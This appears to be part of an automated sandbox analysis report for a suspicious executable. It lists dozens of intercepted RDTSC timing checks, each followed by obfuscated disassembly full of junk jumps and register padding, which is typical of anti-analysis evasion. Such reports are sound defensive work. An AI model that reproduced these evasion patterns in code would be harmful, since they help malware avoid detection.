Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 70311C6 second address: 703128B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3E51171E77h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebp-14h] 0x0000000c jmp 00007F3E51171E76h 0x00000011 mov ecx, esi 0x00000013 jmp 00007F3E51171E70h 0x00000018 mov dword ptr [esi+0Ch], eax 0x0000001b jmp 00007F3E51171E70h 0x00000020 mov edx, 762C06ECh 0x00000025 jmp 00007F3E51171E70h 0x0000002a sub eax, eax 0x0000002c jmp 00007F3E51171E71h 0x00000031 lock cmpxchg dword ptr [edx], ecx 0x00000035 pushad 0x00000036 pushfd 0x00000037 jmp 00007F3E51171E6Ch 0x0000003c jmp 00007F3E51171E75h 0x00000041 popfd 0x00000042 mov ebx, eax 0x00000044 popad 0x00000045 pop edi 0x00000046 push eax 0x00000047 push edx 0x00000048 push eax 0x00000049 push edx 0x0000004a jmp 00007F3E51171E74h 0x0000004f rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 703128B second address: 7031291 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 7031291 second address: 703132B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ebx 0x00000005 pushfd 0x00000006 jmp 00007F3E51171E78h 0x0000000b jmp 00007F3E51171E75h 0x00000010 popfd 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 test eax, eax 0x00000016 jmp 00007F3E51171E6Eh 0x0000001b jne 00007F3EC038026Ah 0x00000021 jmp 00007F3E51171E70h 0x00000026 mov edx, dword ptr [ebp+08h] 0x00000029 jmp 00007F3E51171E70h 0x0000002e mov eax, dword ptr [esi] 0x00000030 pushad 0x00000031 mov ax, 02EDh 0x00000035 call 00007F3E51171E6Ah 0x0000003a mov ebx, eax 0x0000003c pop ecx 0x0000003d popad 0x0000003e mov dword ptr [edx], eax 0x00000040 pushad 0x00000041 mov si, bx 0x00000044 push ebx 0x00000045 mov di, cx 0x00000048 pop eax 0x00000049 popad 0x0000004a mov eax, dword ptr [esi+04h] 0x0000004d push eax 0x0000004e push edx 0x0000004f push eax 0x00000050 push edx 0x00000051 push eax 0x00000052 push edx 0x00000053 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 703132B second address: 703132F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 703132F second address: 7031345 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3E51171E72h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 7031345 second address: 70313B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F3E511046B1h 0x00000008 pop esi 0x00000009 pushfd 0x0000000a jmp 00007F3E511046B1h 0x0000000f xor cx, 59B6h 0x00000014 jmp 00007F3E511046B1h 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d mov dword ptr [edx+04h], eax 0x00000020 jmp 00007F3E511046AEh 0x00000025 mov eax, dword ptr [esi+08h] 0x00000028 jmp 00007F3E511046B0h 0x0000002d mov dword ptr [edx+08h], eax 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 mov edi, 2A834420h 0x00000038 push edi 0x00000039 pop esi 0x0000003a popad 0x0000003b rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 70313B8 second address: 70313FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3E51171E72h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+0Ch] 0x0000000c pushad 0x0000000d mov edx, eax 0x0000000f mov cx, 50B9h 0x00000013 popad 0x00000014 mov dword ptr [edx+0Ch], eax 0x00000017 jmp 00007F3E51171E74h 0x0000001c mov eax, dword ptr [esi+10h] 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 mov ecx, edi 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 70313FA second address: 70313FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 70313FF second address: 7031460 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F3E51171E72h 0x00000009 sub si, 7328h 0x0000000e jmp 00007F3E51171E6Bh 0x00000013 popfd 0x00000014 mov ax, 201Fh 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov dword ptr [edx+10h], eax 0x0000001e pushad 0x0000001f push ecx 0x00000020 push ebx 0x00000021 pop ecx 0x00000022 pop ebx 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007F3E51171E76h 0x0000002a sbb cx, 80B8h 0x0000002f jmp 00007F3E51171E6Bh 0x00000034 popfd 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 7031460 second address: 7031476 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [esi+14h] 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F3E511046ABh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 7031476 second address: 70314A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3E51171E79h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+14h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F3E51171E6Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 70314A5 second address: 70314AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 70314AB second address: 703150D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+18h] 0x0000000b pushad 0x0000000c mov bx, 5CA8h 0x00000010 pushfd 0x00000011 jmp 00007F3E51171E71h 0x00000016 adc si, 3616h 0x0000001b jmp 00007F3E51171E71h 0x00000020 popfd 0x00000021 popad 0x00000022 mov dword ptr [edx+18h], eax 0x00000025 pushad 0x00000026 mov bh, ah 0x00000028 movsx ebx, cx 0x0000002b popad 0x0000002c mov eax, dword ptr [esi+1Ch] 0x0000002f jmp 00007F3E51171E70h 0x00000034 mov dword ptr [edx+1Ch], eax 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a mov cl, dh 0x0000003c mov al, 66h 0x0000003e popad 0x0000003f rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 703150D second address: 7031513 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 7031513 second address: 70315A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+20h] 0x0000000b pushad 0x0000000c jmp 00007F3E51171E74h 0x00000011 pushfd 0x00000012 jmp 00007F3E51171E72h 0x00000017 adc esi, 75E04628h 0x0000001d jmp 00007F3E51171E6Bh 0x00000022 popfd 0x00000023 popad 0x00000024 mov dword ptr [edx+20h], eax 0x00000027 jmp 00007F3E51171E76h 0x0000002c mov eax, dword ptr [esi+24h] 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 jmp 00007F3E51171E6Dh 0x00000037 pushfd 0x00000038 jmp 00007F3E51171E70h 0x0000003d sub esi, 7BDC5AE8h 0x00000043 jmp 00007F3E51171E6Bh 0x00000048 popfd 0x00000049 popad 0x0000004a rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 70315A9 second address: 70315AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 70315AF second address: 7031605 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3E51171E6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [edx+24h], eax 0x0000000e jmp 00007F3E51171E76h 0x00000013 mov eax, dword ptr [esi+28h] 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007F3E51171E6Dh 0x0000001f add ax, B266h 0x00000024 jmp 00007F3E51171E71h 0x00000029 popfd 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 7031605 second address: 703160B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 703160B second address: 703162F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3E51171E76h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [edx+28h], eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 mov ebx, ecx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 703162F second address: 70316C3 instructions: 0x00000000 rdtsc 0x00000002 movzx eax, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushfd 0x00000008 jmp 00007F3E511046B5h 0x0000000d add eax, 62B533D6h 0x00000013 jmp 00007F3E511046B1h 0x00000018 popfd 0x00000019 popad 0x0000001a mov ecx, dword ptr [esi+2Ch] 0x0000001d pushad 0x0000001e mov di, si 0x00000021 movzx eax, di 0x00000024 popad 0x00000025 mov dword ptr [edx+2Ch], ecx 0x00000028 pushad 0x00000029 jmp 00007F3E511046B1h 0x0000002e pushfd 0x0000002f jmp 00007F3E511046B0h 0x00000034 xor si, 1C58h 0x00000039 jmp 00007F3E511046ABh 0x0000003e popfd 0x0000003f popad 0x00000040 mov ax, word ptr [esi+30h] 0x00000044 push eax 0x00000045 push edx 0x00000046 jmp 00007F3E511046B5h 0x0000004b rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 70316C3 second address: 70316C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 70316C9 second address: 70316CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 70316CD second address: 70316D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 70316D1 second address: 70316E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov word ptr [edx+30h], ax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov dl, cl 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 70316E5 second address: 70316EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 70316EA second address: 70317E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov ax, word ptr [esi+32h] 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F3E511046B7h 0x00000012 or si, CDDEh 0x00000017 jmp 00007F3E511046B9h 0x0000001c popfd 0x0000001d pushfd 0x0000001e jmp 00007F3E511046B0h 0x00000023 sub cx, 65D8h 0x00000028 jmp 00007F3E511046ABh 0x0000002d popfd 0x0000002e popad 0x0000002f mov word ptr [edx+32h], ax 0x00000033 jmp 00007F3E511046B6h 0x00000038 mov eax, dword ptr [esi+34h] 0x0000003b jmp 00007F3E511046B0h 0x00000040 mov dword ptr [edx+34h], eax 0x00000043 jmp 00007F3E511046B0h 0x00000048 test ecx, 00000700h 0x0000004e pushad 0x0000004f pushfd 0x00000050 jmp 00007F3E511046AEh 0x00000055 sbb esi, 6CB9E9C8h 0x0000005b jmp 00007F3E511046ABh 0x00000060 popfd 0x00000061 mov dx, ax 0x00000064 popad 0x00000065 jne 00007F3EC0312601h 0x0000006b pushad 0x0000006c mov dx, cx 0x0000006f mov ebx, esi 0x00000071 popad 0x00000072 or dword ptr [edx+38h], FFFFFFFFh 0x00000076 push eax 0x00000077 push edx 0x00000078 jmp 00007F3E511046B5h 0x0000007d rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 70317E4 second address: 703180E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edi 0x00000005 mov dh, 9Dh 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a or dword ptr [edx+3Ch], FFFFFFFFh 0x0000000e jmp 00007F3E51171E72h 0x00000013 or dword ptr [edx+40h], FFFFFFFFh 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 703180E second address: 7031812 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 7031812 second address: 7031818 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 70206F2 second address: 70206F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 70206F7 second address: 702071C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 pop ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F3E51171E6Fh 0x00000010 xchg eax, ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 mov di, 4186h 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 702071C second address: 7020739 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3E511046B9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 7020739 second address: 702076A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3E51171E71h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e mov esi, 13D56FB3h 0x00000013 mov edx, esi 0x00000015 popad 0x00000016 pop ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a jmp 00007F3E51171E6Ah 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 6FC06CC second address: 6FC06D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 6FC0AC2 second address: 6FC0AC8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 7010AFA second address: 7010AFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 7010AFE second address: 7010B02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 7010B02 second address: 7010B08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 7010B08 second address: 7010B2D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3E51171E72h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F3E51171E6Ah 0x00000013 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 7010B2D second address: 7010B3C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3E511046ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 7010B3C second address: 7010B6E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F3E51171E6Fh 0x00000009 adc cl, 0000001Eh 0x0000000c jmp 00007F3E51171E79h 0x00000011 popfd 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 7010B6E second address: 7010BD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007F3E511046B7h 0x0000000d xchg eax, ebp 0x0000000e jmp 00007F3E511046B6h 0x00000013 mov ebp, esp 0x00000015 jmp 00007F3E511046B0h 0x0000001a pop ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F3E511046B7h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 7010BD0 second address: 7010BD5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 6FF0029 second address: 6FF00A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx eax, bx 0x00000006 pushfd 0x00000007 jmp 00007F3E511046AFh 0x0000000c adc esi, 2E832B8Eh 0x00000012 jmp 00007F3E511046B9h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push eax 0x0000001c pushad 0x0000001d jmp 00007F3E511046B7h 0x00000022 pushad 0x00000023 pushfd 0x00000024 jmp 00007F3E511046B6h 0x00000029 sbb esi, 12B75068h 0x0000002f jmp 00007F3E511046ABh 0x00000034 popfd 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 6FF00A7 second address: 6FF013E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 xchg eax, ebp 0x00000007 pushad 0x00000008 mov bx, 6144h 0x0000000c popad 0x0000000d mov ebp, esp 0x0000000f jmp 00007F3E51171E73h 0x00000014 and esp, FFFFFFF0h 0x00000017 jmp 00007F3E51171E76h 0x0000001c sub esp, 44h 0x0000001f pushad 0x00000020 mov dx, ax 0x00000023 mov bx, ax 0x00000026 popad 0x00000027 xchg eax, ebx 0x00000028 pushad 0x00000029 call 00007F3E51171E72h 0x0000002e pushad 0x0000002f popad 0x00000030 pop eax 0x00000031 pushad 0x00000032 pushfd 0x00000033 jmp 00007F3E51171E77h 0x00000038 jmp 00007F3E51171E73h 0x0000003d popfd 0x0000003e mov ax, 1DDFh 0x00000042 popad 0x00000043 popad 0x00000044 push eax 0x00000045 push eax 0x00000046 push edx 0x00000047 push eax 0x00000048 push edx 0x00000049 pushad 0x0000004a popad 0x0000004b rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 6FF013E second address: 6FF0142 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 6FF0142 second address: 6FF0148 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 6FF0148 second address: 6FF01BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F3E511046AFh 0x00000009 sbb cx, B9DEh 0x0000000e jmp 00007F3E511046B9h 0x00000013 popfd 0x00000014 call 00007F3E511046B0h 0x00000019 pop eax 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d xchg eax, ebx 0x0000001e pushad 0x0000001f push edx 0x00000020 mov dh, al 0x00000022 pop ebx 0x00000023 push ecx 0x00000024 push edi 0x00000025 pop ecx 0x00000026 pop edi 0x00000027 popad 0x00000028 xchg eax, esi 0x00000029 jmp 00007F3E511046AAh 0x0000002e push eax 0x0000002f jmp 00007F3E511046ABh 0x00000034 xchg eax, esi 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 movsx edx, ax 0x0000003b movzx ecx, dx 0x0000003e popad 0x0000003f rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 6FF01BB second address: 6FF0284 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop edi 0x00000005 mov esi, 7EFA6157h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, edi 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F3E51171E78h 0x00000015 sub cl, FFFFFFF8h 0x00000018 jmp 00007F3E51171E6Bh 0x0000001d popfd 0x0000001e mov bl, ah 0x00000020 popad 0x00000021 push eax 0x00000022 pushad 0x00000023 jmp 00007F3E51171E70h 0x00000028 mov dx, si 0x0000002b popad 0x0000002c xchg eax, edi 0x0000002d jmp 00007F3E51171E6Ch 0x00000032 mov edi, dword ptr [ebp+08h] 0x00000035 jmp 00007F3E51171E70h 0x0000003a mov dword ptr [esp+24h], 00000000h 0x00000042 pushad 0x00000043 mov di, ax 0x00000046 mov ch, FFh 0x00000048 popad 0x00000049 lock bts dword ptr [edi], 00000000h 0x0000004e jmp 00007F3E51171E75h 0x00000053 jc 00007F3EC14D4045h 0x00000059 pushad 0x0000005a jmp 00007F3E51171E73h 0x0000005f popad 0x00000060 pop edi 0x00000061 push eax 0x00000062 push edx 0x00000063 push eax 0x00000064 push edx 0x00000065 jmp 00007F3E51171E70h 0x0000006a rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 6FF0284 second address: 6FF0293 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3E511046ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 6FF0293 second address: 6FF0299 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 6FF0299 second address: 6FF029D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 6FF029D second address: 6FF02A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 6FF02A1 second address: 6FF02CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 pushad 0x0000000a call 00007F3E511046ADh 0x0000000f jmp 00007F3E511046B0h 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 mov di, 26E4h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 6FF02CF second address: 6FF02D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 6FF02D3 second address: 6FF0313 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop ebx 0x00000008 jmp 00007F3E511046B9h 0x0000000d mov esp, ebp 0x0000000f jmp 00007F3E511046AEh 0x00000014 pop ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F3E511046AAh 0x0000001e rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 6FF0313 second address: 6FF0317 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 6FF0317 second address: 6FF031D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 6FF031D second address: 6FF0323 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 6FF0323 second address: 6FF0327 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 7010ABB second address: 7010AD7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3E51171E71h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov bl, E7h 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 7020A28 second address: 7020A44 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3E511046B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 7020B88 second address: 7020B9E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3E51171E72h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 7020B9E second address: 7020BA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
